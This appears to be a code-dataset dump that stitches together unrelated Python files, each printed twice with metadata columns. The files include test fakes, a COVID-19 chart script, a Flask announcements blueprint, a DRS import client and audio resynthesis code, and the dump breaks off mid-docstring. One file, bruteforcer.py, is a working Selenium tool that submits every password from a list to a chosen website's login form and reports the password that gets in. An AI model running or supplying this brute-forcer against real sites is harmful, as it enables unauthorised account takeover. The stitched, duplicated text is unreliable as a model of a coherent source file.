async def __aexit__(self, exc_type, exc_val, exc_tb):
return
class FakeLockPool(MinosPool):
"""For testing purposes."""
async def _create_instance(self):
return FakeLock()
async def _destroy_instance(self, instance) -> None:
"""For testing purposes."""
class FakeBrokerPool(MinosPool):
"""For testing purposes."""
async def _create_instance(self):
return FakeBroker()
async def _destroy_instance(self, instance) -> None:
"""For testing purposes."""
class Owner(Aggregate):
"""Aggregate ``Owner`` class for testing purposes."""
name: str
surname: str
age: Optional[int]
class Car(Aggregate):
"""Aggregate ``Car`` class for testing purposes."""
doors: int
color: str
owner: Optional[ModelRef[Owner]]
class Order(Aggregate):
"""For testing purposes"""
products: EntitySet[OrderItem]
reviews: ValueObjectSet[Review]
class OrderItem(Entity):
"""For testing purposes"""
amount: int
class Review(ValueObject):
"""For testing purposes."""
message: str | en | 0.686641 | For testing purposes. For testing purposes. For testing purposes. For testing purposes. For testing purposes. For testing purposes. For testing purposes. For testing purposes. For testing purposes. For testing purposes. For testing purposes. Aggregate ``Owner`` class for testing purposes. Aggregate ``Car`` class for testing purposes. For testing purposes For testing purposes For testing purposes. | 1.958163 | 2 |
MyVisualizations/MyVisualization6.py | ClownMonster/Covid-19_Visualization_ML | 0 | 6612412 | '''
This is to Render the Graphs for Confirmed, Deaths and Recovered Cases for the Required
Country.
'''
from DataSupply import Supply
import plotly.express as px
class clownRenders:
def __init__(self):
countryName = input('Enter the Country : ')
db_ob = Supply(countryName)
if db_ob.empty:
print('Invalid Country Name')
return
else:
self.db_ob = db_ob
self.countryName = countryName
return
def forConfirmed(self):
fig = px.bar(self.db_ob, x='Date',
y='Confirmed', color='Confirmed',
barmode='group', height=600)
fig.update_layout(title_text = f'Visualization of Confirmed Cases in {self.countryName}')
fig.show()
return
def forDeath(self):
fig = px.bar(self.db_ob, x='Date',
y='Deaths', color='Deaths',
barmode='group', height=600)
fig.update_layout(title_text = f'Visualization of Death Cases in {self.countryName}')
fig.show()
return
def forRecovered(self):
fig = px.bar(self.db_ob, x='Date',
y='Recoverd', color='Recovered',
barmode='group', height=600)
fig.update_layout(title_text = f'Visualization of Recovered Cases in {self.countryName}')
fig.show()
return
if __name__ == "__main__":
counter = True
while(counter):
ob = clownRenders() #object reference Formed for a particular country
try:
choice = input('1.Confirmed Cases \n2.Death Cases \n3.Recovered Cases\n4.Quit\nEnter Your Choice : ')
if(choice == '1'):
ob.forConfirmed()
elif(choice == '2'):
ob.forDeath()
elif(choice == '3'):
ob.forRecovered()
elif(choice == '4'):
counter = False
else:
print('Invalid Choice')
except:
print('Invalid Choice')
| '''
This is to Render the Graphs for Confirmed, Deaths and Recovered Cases for the Required
Country.
'''
from DataSupply import Supply
import plotly.express as px
class clownRenders:
def __init__(self):
countryName = input('Enter the Country : ')
db_ob = Supply(countryName)
if db_ob.empty:
print('Invalid Country Name')
return
else:
self.db_ob = db_ob
self.countryName = countryName
return
def forConfirmed(self):
fig = px.bar(self.db_ob, x='Date',
y='Confirmed', color='Confirmed',
barmode='group', height=600)
fig.update_layout(title_text = f'Visualization of Confirmed Cases in {self.countryName}')
fig.show()
return
def forDeath(self):
fig = px.bar(self.db_ob, x='Date',
y='Deaths', color='Deaths',
barmode='group', height=600)
fig.update_layout(title_text = f'Visualization of Death Cases in {self.countryName}')
fig.show()
return
def forRecovered(self):
fig = px.bar(self.db_ob, x='Date',
y='Recoverd', color='Recovered',
barmode='group', height=600)
fig.update_layout(title_text = f'Visualization of Recovered Cases in {self.countryName}')
fig.show()
return
if __name__ == "__main__":
counter = True
while(counter):
ob = clownRenders() #object reference Formed for a particular country
try:
choice = input('1.Confirmed Cases \n2.Death Cases \n3.Recovered Cases\n4.Quit\nEnter Your Choice : ')
if(choice == '1'):
ob.forConfirmed()
elif(choice == '2'):
ob.forDeath()
elif(choice == '3'):
ob.forRecovered()
elif(choice == '4'):
counter = False
else:
print('Invalid Choice')
except:
print('Invalid Choice')
| en | 0.859748 | This is to Render the Graphs for Confirmed, Deaths and Recovered Cases for the Required Country. #object reference Formed for a particular country | 3.414258 | 3 |
bruteforcer.py | adnmaster2008/WyernWebsiteBruteForcer | 0 | 6612413 | <reponame>adnmaster2008/WyernWebsiteBruteForcer
import time
import os
import selenium
from selenium.webdriver import Chrome
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
chromedriver_dir = "chromedriver.exe"
website_first_time_open_delay = 5
website_name = input("Enter website name: ")
login_selector = input("Enter login selector: ")
password_selector = input("Enter password selector: ")
while True:
password_list_name = input("Enter location of password_list: ")
if(os.path.exists(password_list_name)):
break
else:
print("Location doesn't exist")
password_list_file = open(password_list_name, "r")
password_list = password_list_file.read().splitlines()
password_list_file.close()
login_name = input("Enter username: ")
print("Starting...")
browser = Chrome(chromedriver_dir)
browser.get(website_name)
time.sleep(website_first_time_open_delay)
login_input_field = browser.find_element_by_css_selector(login_selector)
password_input_field = browser.find_element_by_css_selector(password_selector)
while True:
for x in range(1, len(password_list)):
login_input_field.send_keys(Keys.CONTROL + "a")
login_input_field.send_keys(Keys.DELETE)
password_input_field.send_keys(Keys.CONTROL + "a")
password_input_field.send_keys(Keys.DELETE)
login_input_field.send_keys(login_name)
password_input_field.send_keys(password_list[x])
password_input_field.submit()
print(password_list[x])
try:
if(True):
time.sleep(5)
WebDriverWait(browser, 1).until(EC.presence_of_element_located((By.CSS_SELECTOR, login_selector)))
WebDriverWait(browser, 1).until(EC.presence_of_element_located((By.CSS_SELECTOR, password_selector)))
else:
WebDriverWait(browser, 7).until(EC.presence_of_element_located((By.CSS_SELECTOR, login_selector)))
WebDriverWait(browser, 7).until(EC.presence_of_element_located((By.CSS_SELECTOR, password_selector)))
except:
print("Password found :)")
print("Password: "+password_list[x])
while True:
pass | import time
import os
import selenium
from selenium.webdriver import Chrome
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
chromedriver_dir = "chromedriver.exe"
website_first_time_open_delay = 5
website_name = input("Enter website name: ")
login_selector = input("Enter login selector: ")
password_selector = input("Enter password selector: ")
while True:
password_list_name = input("Enter location of password_list: ")
if(os.path.exists(password_list_name)):
break
else:
print("Location doesn't exist")
password_list_file = open(password_list_name, "r")
password_list = password_list_file.read().splitlines()
password_list_file.close()
login_name = input("Enter username: ")
print("Starting...")
browser = Chrome(chromedriver_dir)
browser.get(website_name)
time.sleep(website_first_time_open_delay)
login_input_field = browser.find_element_by_css_selector(login_selector)
password_input_field = browser.find_element_by_css_selector(password_selector)
while True:
for x in range(1, len(password_list)):
login_input_field.send_keys(Keys.CONTROL + "a")
login_input_field.send_keys(Keys.DELETE)
password_input_field.send_keys(Keys.CONTROL + "a")
password_input_field.send_keys(Keys.DELETE)
login_input_field.send_keys(login_name)
password_input_field.send_keys(password_list[x])
password_input_field.submit()
print(password_list[x])
try:
if(True):
time.sleep(5)
WebDriverWait(browser, 1).until(EC.presence_of_element_located((By.CSS_SELECTOR, login_selector)))
WebDriverWait(browser, 1).until(EC.presence_of_element_located((By.CSS_SELECTOR, password_selector)))
else:
WebDriverWait(browser, 7).until(EC.presence_of_element_located((By.CSS_SELECTOR, login_selector)))
WebDriverWait(browser, 7).until(EC.presence_of_element_located((By.CSS_SELECTOR, password_selector)))
except:
print("Password found :)")
print("Password: "+password_list[x])
while True:
pass | none | 1 | 2.910427 | 3 | |
tests/selenium/guiops/pages/load_balancer/load_balancer_detail.py | gholms/eucaconsole | 0 | 6612414 | <filename>tests/selenium/guiops/pages/load_balancer/load_balancer_detail.py
from pages.detailpage import DetailPage
class ELBDetailPage(DetailPage):
def __init__(self, tester, load_balancer_name):
"""
Initiates ELB Detail page object.
:param load_balancer_name:
:param tester:
"""
self.load_balancer_name = load_balancer_name
self.tester = tester
| <filename>tests/selenium/guiops/pages/load_balancer/load_balancer_detail.py
from pages.detailpage import DetailPage
class ELBDetailPage(DetailPage):
def __init__(self, tester, load_balancer_name):
"""
Initiates ELB Detail page object.
:param load_balancer_name:
:param tester:
"""
self.load_balancer_name = load_balancer_name
self.tester = tester
| en | 0.695762 | Initiates ELB Detail page object. :param load_balancer_name: :param tester: | 2.02254 | 2 |
app_blue_points/webse/announcements/routes.py | mariobp-NHH/Sustainable_Energy_Web1_v2 | 0 | 6612415 | <filename>app_blue_points/webse/announcements/routes.py
import os
import secrets
import json
from datetime import timedelta, datetime
from PIL import Image
from flask import render_template, url_for, flash, redirect, request, abort, jsonify, Blueprint
from webse import app, db, bcrypt
from webse.announcements.forms import AnnouncementForm
from webse.models import User, Moduls, Announcement, Chat, Emissions
from flask_login import login_user, current_user, logout_user, login_required
announcements = Blueprint('announcements', __name__)
##################################
#### Block 2. Announcement ###
###################################
@announcements.route("/announcement/new", methods=['GET', 'POST'])
@login_required
def new_announcement():
form = AnnouncementForm()
if form.validate_on_submit():
announcement = Announcement(title=form.title.data, content=form.content.data, author=current_user)
db.session.add(announcement)
db.session.commit()
flash('Your announcement has been created!', 'success')
return redirect(url_for('home.home_main'))
return render_template('announcement/create_announcement.html', title='New Announcement',
form=form, legend='New Announcement')
@announcements.route("/announcement/<int:announcement_id>")
def announcement(announcement_id):
announcement = Announcement.query.get_or_404(announcement_id)
return render_template('announcement/announcement.html', title=announcement.title, announcement=announcement)
@announcements.route("/announcement/<int:announcement_id>/update", methods=['GET', 'POST'])
@login_required
def update_announcement(announcement_id):
announcement = Announcement.query.get_or_404(announcement_id)
if announcement.author != current_user:
abort(403)
form = AnnouncementForm()
if form.validate_on_submit():
announcement.title = form.title.data
announcement.content = form.content.data
db.session.commit()
flash('Your announcement has been updated!', 'success')
return redirect(url_for('announcements.announcement', announcement_id=announcement.id))
elif request.method == 'GET':
form.title.data = announcement.title
form.content.data = announcement.content
return render_template('announcement/create_announcement.html', title='Update Announcement',
form=form, legend='Update Announcement')
@announcements.route("/announcement/<int:announcement_id>/delete", methods=['GET', 'POST'])
@login_required
def delete_announcement(announcement_id):
announcement = Announcement.query.get_or_404(int(announcement_id))
if announcement.author != current_user:
abort(403)
db.session.delete(announcement)
db.session.commit()
flash('Your announcement has been deleted!', 'success')
return redirect(url_for('home.home_main'))
| <filename>app_blue_points/webse/announcements/routes.py
import os
import secrets
import json
from datetime import timedelta, datetime
from PIL import Image
from flask import render_template, url_for, flash, redirect, request, abort, jsonify, Blueprint
from webse import app, db, bcrypt
from webse.announcements.forms import AnnouncementForm
from webse.models import User, Moduls, Announcement, Chat, Emissions
from flask_login import login_user, current_user, logout_user, login_required
announcements = Blueprint('announcements', __name__)
##################################
#### Block 2. Announcement ###
###################################
@announcements.route("/announcement/new", methods=['GET', 'POST'])
@login_required
def new_announcement():
form = AnnouncementForm()
if form.validate_on_submit():
announcement = Announcement(title=form.title.data, content=form.content.data, author=current_user)
db.session.add(announcement)
db.session.commit()
flash('Your announcement has been created!', 'success')
return redirect(url_for('home.home_main'))
return render_template('announcement/create_announcement.html', title='New Announcement',
form=form, legend='New Announcement')
@announcements.route("/announcement/<int:announcement_id>")
def announcement(announcement_id):
announcement = Announcement.query.get_or_404(announcement_id)
return render_template('announcement/announcement.html', title=announcement.title, announcement=announcement)
@announcements.route("/announcement/<int:announcement_id>/update", methods=['GET', 'POST'])
@login_required
def update_announcement(announcement_id):
announcement = Announcement.query.get_or_404(announcement_id)
if announcement.author != current_user:
abort(403)
form = AnnouncementForm()
if form.validate_on_submit():
announcement.title = form.title.data
announcement.content = form.content.data
db.session.commit()
flash('Your announcement has been updated!', 'success')
return redirect(url_for('announcements.announcement', announcement_id=announcement.id))
elif request.method == 'GET':
form.title.data = announcement.title
form.content.data = announcement.content
return render_template('announcement/create_announcement.html', title='Update Announcement',
form=form, legend='Update Announcement')
@announcements.route("/announcement/<int:announcement_id>/delete", methods=['GET', 'POST'])
@login_required
def delete_announcement(announcement_id):
announcement = Announcement.query.get_or_404(int(announcement_id))
if announcement.author != current_user:
abort(403)
db.session.delete(announcement)
db.session.commit()
flash('Your announcement has been deleted!', 'success')
return redirect(url_for('home.home_main'))
| de | 0.858357 | ################################## #### Block 2. Announcement ### ################################### | 2.24714 | 2 |
ingester/fio/__init__.py | shapeshift-legacy/watchtower | 0 | 6612416 | from .fio_block_ingester import FioBlockIngester
fio_block_ingester = FioBlockIngester()
| from .fio_block_ingester import FioBlockIngester
fio_block_ingester = FioBlockIngester()
| none | 1 | 1.160814 | 1 | |
L06/synthtrax.py | dpwe/elene4896 | 19 | 6612417 | """Resynthesis of signals described as sinusoid tracks."""
import numpy as np
def synthtrax(F, M, SR, SUBF=128, DUR=0):
"""
% X = synthtrax(F, M, SR, SUBF, DUR) Reconstruct a sound from track rep'n.
% Each row of F and M contains a series of frequency and magnitude
% samples for a particular track. These will be remodulated and
% overlaid into the output sound X which will run at sample rate SR,
% although the columns in F and M are subsampled from that rate by
% a factor SUBF (default 128). If DUR is nonzero, X will be padded or
% truncated to correspond to just this much time.
% <EMAIL> 1994aug20, 1996aug22
"""
rows, cols = F.shape
opsamps = int(np.round(DUR * SR))
if not DUR:
opsamps = cols * SUBF
X = np.zeros(opsamps)
for row in xrange(rows):
mm = M[row]
ff = F[row]
# First, find onsets - points where mm goes from zero (or NaN) to nzero
# Before that, even, set all nan values of mm to zero
nzv = np.nonzero(mm)[0]
firstcol = np.min(nzv)
lastcol = np.max(nzv)
# for speed, chop off regions of initial and final zero magnitude -
# but want to include one zero from each end if they are there
zz = np.arange(np.maximum(0, firstcol-1), np.minimum(cols, lastcol+1))
nzcols = zz.shape[0]
if nzcols > 0:
mm = mm[zz]
ff = ff[zz]
mz = mm == 0
# Copy frequency values to one point past each end of nonzero stretches.
onsets = np.nonzero(np.logical_and(mz > 0, np.hstack(
[1, mz[:-1]]) == 0))[0]
ff[onsets - 1] = ff[onsets]
offsets = np.nonzero(np.logical_and(mz[:-1] > 0, mz[1:] == 0))[0]
ff[offsets + 1] = ff[offsets]
# Do interpolation.
ff = np.interp(np.arange(ff.shape[0] * SUBF)/float(SUBF),
np.arange(ff.shape[0]), ff)
mm = np.interp(np.arange(mm.shape[0] * SUBF)/float(SUBF),
np.arange(mm.shape[0]), mm)
# Convert frequency to phase values.
pp = np.cumsum(2*np.pi*ff/SR)
# Run the oscillator and apply the magnitude envelope.
xx = mm * np.cos(pp)
# Add it in to the correct place in the array.
X[SUBF * zz[0] + np.arange(xx.shape[0])] += xx
return X
def spearread(FN):
"""
% [F,M,T] = spearread(FN)
% Read in a sinusoidal analysis file written by Michael
% Klingbeil's SPEAR program, into Frequency and Magnitude
% matrices suitable for synthtrax.m. T is the actual time
% values for each column.
% 2010-02-14 <NAME> <EMAIL>
"""
# Files begin:
#par-text-frame-format
#point-type index frequency amplitude
#partials-count 32
#frame-count 549
#frame-data
#0.124943 1 0 430.064423 0.001209
#0.134943 1 0 429.900024 0.002103
#0.144943 5 0 430.215668 0.003097 4 855.366638 0.002075 3 1742.146851 0.002967 2 2165.423096 0.001978 1 2565.337402 0.001767
#0.154943 9 0 431.365143 0.004033 4 865.541565 0.003474 8 1298.919067 0.001814 3 1743.450806 0.00
# Each line is: time nharmonics indx0 freq0 amp0 indx1 freq1 amp1 ...
# indx values serve to connect tracks between frames.
with open(FN, "r") as f:
s = f.next().strip()
if s != 'par-text-frame-format':
raise ValueError(FN + ' does not look like SPEAR harmonics file')
s = f.next().strip()
if s != 'point-type index frequency amplitude':
raise ValueError('Did not see point-type ... in ' + FN)
s = f.next().strip()
if s.split(' ')[0] != 'partials-count':
raise ValueError('Missing partials-count in ' + FN)
partials_count = int(s.split(' ')[1])
s = f.next().strip()
if s.split(' ')[0] != 'frame-count':
raise ValueError('Missing frame-count in ' + FN)
frame_count = int(s.split(' ')[1])
s = f.next().strip()
if s != 'frame-data':
raise ValueError('Missing frame-data in ' + FN)
T = np.zeros(frame_count)
F = np.zeros((partials_count, frame_count))
M = np.zeros((partials_count, frame_count))
frame = 0
for s in f:
vals = [float(v) for v in s.split(' ')]
T[frame] = vals[0]
partials_this_frame = int(vals[1])
field_index = 2
for _ in xrange(partials_this_frame):
partial_index = int(vals[field_index])
F[partial_index, frame] = vals[field_index + 1]
M[partial_index, frame] = vals[field_index + 2]
field_index += 3
frame += 1
return F, M, T
| """Resynthesis of signals described as sinusoid tracks."""
import numpy as np
def synthtrax(F, M, SR, SUBF=128, DUR=0):
"""
% X = synthtrax(F, M, SR, SUBF, DUR) Reconstruct a sound from track rep'n.
% Each row of F and M contains a series of frequency and magnitude
% samples for a particular track. These will be remodulated and
% overlaid into the output sound X which will run at sample rate SR,
% although the columns in F and M are subsampled from that rate by
% a factor SUBF (default 128). If DUR is nonzero, X will be padded or
% truncated to correspond to just this much time.
% <EMAIL> 1994aug20, 1996aug22
"""
rows, cols = F.shape
opsamps = int(np.round(DUR * SR))
if not DUR:
opsamps = cols * SUBF
X = np.zeros(opsamps)
for row in xrange(rows):
mm = M[row]
ff = F[row]
# First, find onsets - points where mm goes from zero (or NaN) to nzero
# Before that, even, set all nan values of mm to zero
nzv = np.nonzero(mm)[0]
firstcol = np.min(nzv)
lastcol = np.max(nzv)
# for speed, chop off regions of initial and final zero magnitude -
# but want to include one zero from each end if they are there
zz = np.arange(np.maximum(0, firstcol-1), np.minimum(cols, lastcol+1))
nzcols = zz.shape[0]
if nzcols > 0:
mm = mm[zz]
ff = ff[zz]
mz = mm == 0
# Copy frequency values to one point past each end of nonzero stretches.
onsets = np.nonzero(np.logical_and(mz > 0, np.hstack(
[1, mz[:-1]]) == 0))[0]
ff[onsets - 1] = ff[onsets]
offsets = np.nonzero(np.logical_and(mz[:-1] > 0, mz[1:] == 0))[0]
ff[offsets + 1] = ff[offsets]
# Do interpolation.
ff = np.interp(np.arange(ff.shape[0] * SUBF)/float(SUBF),
np.arange(ff.shape[0]), ff)
mm = np.interp(np.arange(mm.shape[0] * SUBF)/float(SUBF),
np.arange(mm.shape[0]), mm)
# Convert frequency to phase values.
pp = np.cumsum(2*np.pi*ff/SR)
# Run the oscillator and apply the magnitude envelope.
xx = mm * np.cos(pp)
# Add it in to the correct place in the array.
X[SUBF * zz[0] + np.arange(xx.shape[0])] += xx
return X
def spearread(FN):
"""
% [F,M,T] = spearread(FN)
% Read in a sinusoidal analysis file written by Michael
% Klingbeil's SPEAR program, into Frequency and Magnitude
% matrices suitable for synthtrax.m. T is the actual time
% values for each column.
% 2010-02-14 <NAME> <EMAIL>
"""
# Files begin:
#par-text-frame-format
#point-type index frequency amplitude
#partials-count 32
#frame-count 549
#frame-data
#0.124943 1 0 430.064423 0.001209
#0.134943 1 0 429.900024 0.002103
#0.144943 5 0 430.215668 0.003097 4 855.366638 0.002075 3 1742.146851 0.002967 2 2165.423096 0.001978 1 2565.337402 0.001767
#0.154943 9 0 431.365143 0.004033 4 865.541565 0.003474 8 1298.919067 0.001814 3 1743.450806 0.00
# Each line is: time nharmonics indx0 freq0 amp0 indx1 freq1 amp1 ...
# indx values serve to connect tracks between frames.
with open(FN, "r") as f:
s = f.next().strip()
if s != 'par-text-frame-format':
raise ValueError(FN + ' does not look like SPEAR harmonics file')
s = f.next().strip()
if s != 'point-type index frequency amplitude':
raise ValueError('Did not see point-type ... in ' + FN)
s = f.next().strip()
if s.split(' ')[0] != 'partials-count':
raise ValueError('Missing partials-count in ' + FN)
partials_count = int(s.split(' ')[1])
s = f.next().strip()
if s.split(' ')[0] != 'frame-count':
raise ValueError('Missing frame-count in ' + FN)
frame_count = int(s.split(' ')[1])
s = f.next().strip()
if s != 'frame-data':
raise ValueError('Missing frame-data in ' + FN)
T = np.zeros(frame_count)
F = np.zeros((partials_count, frame_count))
M = np.zeros((partials_count, frame_count))
frame = 0
for s in f:
vals = [float(v) for v in s.split(' ')]
T[frame] = vals[0]
partials_this_frame = int(vals[1])
field_index = 2
for _ in xrange(partials_this_frame):
partial_index = int(vals[field_index])
F[partial_index, frame] = vals[field_index + 1]
M[partial_index, frame] = vals[field_index + 2]
field_index += 3
frame += 1
return F, M, T
| en | 0.753584 | Resynthesis of signals described as sinusoid tracks. % X = synthtrax(F, M, SR, SUBF, DUR) Reconstruct a sound from track rep'n. % Each row of F and M contains a series of frequency and magnitude % samples for a particular track. These will be remodulated and % overlaid into the output sound X which will run at sample rate SR, % although the columns in F and M are subsampled from that rate by % a factor SUBF (default 128). If DUR is nonzero, X will be padded or % truncated to correspond to just this much time. % <EMAIL> 1994aug20, 1996aug22 # First, find onsets - points where mm goes from zero (or NaN) to nzero # Before that, even, set all nan values of mm to zero # for speed, chop off regions of initial and final zero magnitude - # but want to include one zero from each end if they are there # Copy frequency values to one point past each end of nonzero stretches. # Do interpolation. # Convert frequency to phase values. # Run the oscillator and apply the magnitude envelope. # Add it in to the correct place in the array. % [F,M,T] = spearread(FN) % Read in a sinusoidal analysis file written by Michael % Klingbeil's SPEAR program, into Frequency and Magnitude % matrices suitable for synthtrax.m. T is the actual time % values for each column. % 2010-02-14 <NAME> <EMAIL> # Files begin: #par-text-frame-format #point-type index frequency amplitude #partials-count 32 #frame-count 549 #frame-data #0.124943 1 0 430.064423 0.001209 #0.134943 1 0 429.900024 0.002103 #0.144943 5 0 430.215668 0.003097 4 855.366638 0.002075 3 1742.146851 0.002967 2 2165.423096 0.001978 1 2565.337402 0.001767 #0.154943 9 0 431.365143 0.004033 4 865.541565 0.003474 8 1298.919067 0.001814 3 1743.450806 0.00 # Each line is: time nharmonics indx0 freq0 amp0 indx1 freq1 amp1 ... # indx values serve to connect tracks between frames. | 2.895473 | 3 |
sevenbridges/models/drs_import.py | sbg/sevenbridges-python | 46 | 6612418 | <reponame>sbg/sevenbridges-python<filename>sevenbridges/models/drs_import.py
import logging
from sevenbridges.errors import SbgError
from sevenbridges.meta.fields import (
HrefField, StringField, DateTimeField, CompoundListField
)
from sevenbridges.meta.resource import Resource
from sevenbridges.meta.transformer import Transform
from sevenbridges.models.compound.import_result import FileImportResult
from sevenbridges.models.file import File
logger = logging.getLogger(__name__)
class DRSImportBulk(Resource):
    """
    Central resource for managing DRS imports.

    Wraps the bulk DRS import API: submit a batch of DRS imports and poll
    an existing bulk-import job for its state and resulting files.
    """
    _URL = {
        'get': '/bulk/drs/imports/{id}',
        'create': '/bulk/drs/imports/create',
    }
    id = StringField(read_only=True)
    href = HrefField(read_only=True)
    result = CompoundListField(FileImportResult, read_only=True)
    # Class-level default only. The result_files property keeps the real
    # cache in the instance __dict__ so separate import jobs never share
    # cached files (a mutable class attribute is shared by all instances).
    _result_files = []
    state = StringField(read_only=True)
    started_on = DateTimeField(read_only=True)
    finished_on = DateTimeField(read_only=True)

    def __str__(self):
        return f'<DRSBulkImport: id={self.id}>'

    def __eq__(self, other):
        if type(other) is not type(self):
            return False
        return self is other or self.id == other.id

    @property
    def result_files(self):
        """
        Retrieve files that were successfully imported.

        Files already fetched are cached per instance; only ids not seen
        before are requested from the server.

        :return: List of File objects, or None when no results are
            available yet.
        """
        # Lazily create a per-instance cache instead of mutating the
        # shared class-level list.
        cache = self.__dict__.setdefault('_result_files', [])
        try:
            cached_file_ids = {item.resource.id for item in cache}
            imported_file_ids = {
                item.resource.id
                for item in self.result if item.resource
            }
            file_ids_to_retrieve = imported_file_ids - cached_file_ids
            if file_ids_to_retrieve:
                cache.extend(
                    File.bulk_get(files=file_ids_to_retrieve, api=self._api)
                )
            return cache if cache else None
        except TypeError:
            # self.result is not iterable yet (job still running, no result).
            return None

    @classmethod
    def bulk_get(cls, import_job_id, api=None):
        """
        Retrieve DRS bulk import details
        :param import_job_id: Import id to be retrieved.
        :param api: Api instance.
        :return: DRSImportBulk object.
        """
        api = api or cls._API
        if not import_job_id:
            raise SbgError('DRS import is required!')
        elif not isinstance(import_job_id, str):
            raise SbgError('Invalid DRS import parameter!')
        response = api.get(
            url=cls._URL['get'].format(id=import_job_id)
        ).json()
        return DRSImportBulk(api=api, **response)

    @classmethod
    def bulk_submit(
            cls, imports, tags=None, conflict_resolution='SKIP', api=None
    ):
        """
        Submit DRS bulk import
        :param imports: List of dicts describing a wanted import.
        :param tags: list of tags to be applied.
        :param conflict_resolution: Type of file naming conflict resolution.
        :param api: Api instance.
        :return: DRSImportBulk object.
        """
        if not imports:
            raise SbgError('Imports are required')
        api = api or cls._API
        items = []
        for import_ in imports:
            # Shallow-copy so the caller's dicts are not mutated below.
            import_ = dict(import_)
            project = import_.get('project')
            parent = import_.get('parent')
            if project and parent:
                raise SbgError(
                    'Project and parent identifiers are mutually exclusive'
                )
            elif project:
                import_['project'] = Transform.to_project(project)
            elif parent:
                import_['parent'] = Transform.to_file(parent)
            else:
                raise SbgError('Project or parent identifier is required.')
            items.append(import_)
        data = {
            'conflict_resolution': conflict_resolution,
            'tags': tags,
            'items': items
        }
        response = api.post(url=cls._URL['create'], data=data).json()
        return DRSImportBulk(api=api, **response)
| import logging
from sevenbridges.errors import SbgError
from sevenbridges.meta.fields import (
HrefField, StringField, DateTimeField, CompoundListField
)
from sevenbridges.meta.resource import Resource
from sevenbridges.meta.transformer import Transform
from sevenbridges.models.compound.import_result import FileImportResult
from sevenbridges.models.file import File
logger = logging.getLogger(__name__)
class DRSImportBulk(Resource):
"""
Central resource for managing DRS imports.
"""
_URL = {
'get': '/bulk/drs/imports/{id}',
'create': '/bulk/drs/imports/create',
}
id = StringField(read_only=True)
href = HrefField(read_only=True)
result = CompoundListField(FileImportResult, read_only=True)
_result_files = [] # cache for result_files property
state = StringField(read_only=True)
started_on = DateTimeField(read_only=True)
finished_on = DateTimeField(read_only=True)
def __str__(self):
return f'<DRSBulkImport: id={self.id}>'
def __eq__(self, other):
if type(other) is not type(self):
return False
return self is other or self.id == other.id
@property
def result_files(self):
"""
Retrieve files that were successfully imported.
:return: List of File objects
"""
try:
cached_file_ids = set([
file.resource.id for file in self._result_files
])
imported_file_ids = set([
file.resource.id
for file in self.result if file.resource
])
file_ids_to_retrieve = imported_file_ids - cached_file_ids
if file_ids_to_retrieve:
files = File.bulk_get(
files=file_ids_to_retrieve, api=self._api
)
self._result_files.extend(files)
return self._result_files if self._result_files else None
except TypeError:
return None
@classmethod
def bulk_get(cls, import_job_id, api=None):
"""
Retrieve DRS bulk import details
:param import_job_id: Import id to be retrieved.
:param api: Api instance.
:return: DRSImportBulk object.
"""
api = api or cls._API
if not import_job_id:
raise SbgError('DRS import is required!')
elif not isinstance(import_job_id, str):
raise SbgError('Invalid DRS import parameter!')
response = api.get(
url=cls._URL['get'].format(id=import_job_id)
).json()
return DRSImportBulk(api=api, **response)
@classmethod
def bulk_submit(
cls, imports, tags=None, conflict_resolution='SKIP', api=None
):
"""
Submit DRS bulk import
:param imports: List of dicts describing a wanted import.
:param tags: list of tags to be applied.
:param conflict_resolution: Type of file naming conflict resolution.
:param api: Api instance.
:return: DRSImportBulk object.
"""
if not imports:
raise SbgError('Imports are required')
api = api or cls._API
items = []
for import_ in imports:
project = import_.get('project')
parent = import_.get('parent')
if project and parent:
raise SbgError(
'Project and parent identifiers are mutually exclusive'
)
elif project:
import_['project'] = Transform.to_project(project)
elif parent:
import_['parent'] = Transform.to_file(parent)
else:
raise SbgError('Project or parent identifier is required.')
items.append(import_)
data = {
'conflict_resolution': conflict_resolution,
'tags': tags,
'items': items
}
response = api.post(url=cls._URL['create'], data=data).json()
return DRSImportBulk(api=api, **response) | en | 0.74062 | Central resource for managing DRS imports. # cache for result_files property Retrieve files that were successfully imported. :return: List of File objects Retrieve DRS bulk import details :param import_job_id: Import id to be retrieved. :param api: Api instance. :return: DRSImportBulk object. Submit DRS bulk import :param imports: List of dicts describing a wanted import. :param tags: list of tags to be applied. :param conflict_resolution: Type of file naming conflict resolution. :param api: Api instance. :return: DRSImportBulk object. | 1.95006 | 2 |
figure_2.py | gortizji/inr_dictionaries | 11 | 6612419 | <reponame>gortizji/inr_dictionaries
import os
import imageio
import jax
import matplotlib.pyplot as plt
import numpy as np
from skimage.transform import resize
import warnings
from models.models_flax import FFN
from train.standard import fit_image
from utils.graphics import plot_fourier_tranform
from utils.img_processing import crop_from_right, image_to_dataset
def plot_reconstructions(
    outputs,
    image_GT,
    save_phrase="",
):
    """Save the final reconstruction, ground truth, and their Fourier
    transforms as PDFs under figures/figure_2.

    :param outputs: dict from training; ``outputs["pred_imgs"][-1]`` is the
        final predicted image.
    :param image_GT: ground-truth image array.
    :param save_phrase: suffix embedded in the saved filenames.
    """
    outdir = os.path.join(os.getcwd(), "figures", "figure_2")
    # exist_ok avoids the exists()/makedirs() race of the original check.
    os.makedirs(outdir, exist_ok=True)
    rec = outputs["pred_imgs"][-1]
    # Final network output
    plt.figure(figsize=(12, 4))
    plt.imshow(rec)
    plt.axis("off")
    plt.savefig(os.path.join(outdir, "rec_" + save_phrase + ".pdf"),
                bbox_inches="tight")
    # Ground truth
    plt.figure()
    plt.imshow(image_GT)
    plt.axis("off")
    plt.savefig(os.path.join(outdir, "gt_" + save_phrase + ".pdf"),
                bbox_inches="tight")
    # Fourier transform of the reconstruction
    plt.figure()
    plot_fourier_tranform(rec)
    plt.savefig(os.path.join(outdir, "rec_ft_" + save_phrase + ".pdf"),
                bbox_inches="tight")
    # Fourier transform of the ground truth
    plt.figure()
    plot_fourier_tranform(image_GT)
    plt.savefig(os.path.join(outdir, "gt_ft_" + save_phrase + ".pdf"),
                bbox_inches="tight")
def train_and_plot_image(
    model,
    train_data,
    test_data,
    image_GT,
    optimizer_type="adam",
    batch_size=None,
    start_iter=0,
    initial_params=None,
    optimizer=None,
    opt_state=None,
    last_layer_rand_init=False,
    log_every=25,
    iters=2000,
    learning_rate=1e-4,
    rand_state=0,
    save_phrase="",
):
    """Fit *model* to *train_data* and save reconstruction figures.

    Thin wrapper around ``fit_image`` that forwards every training option
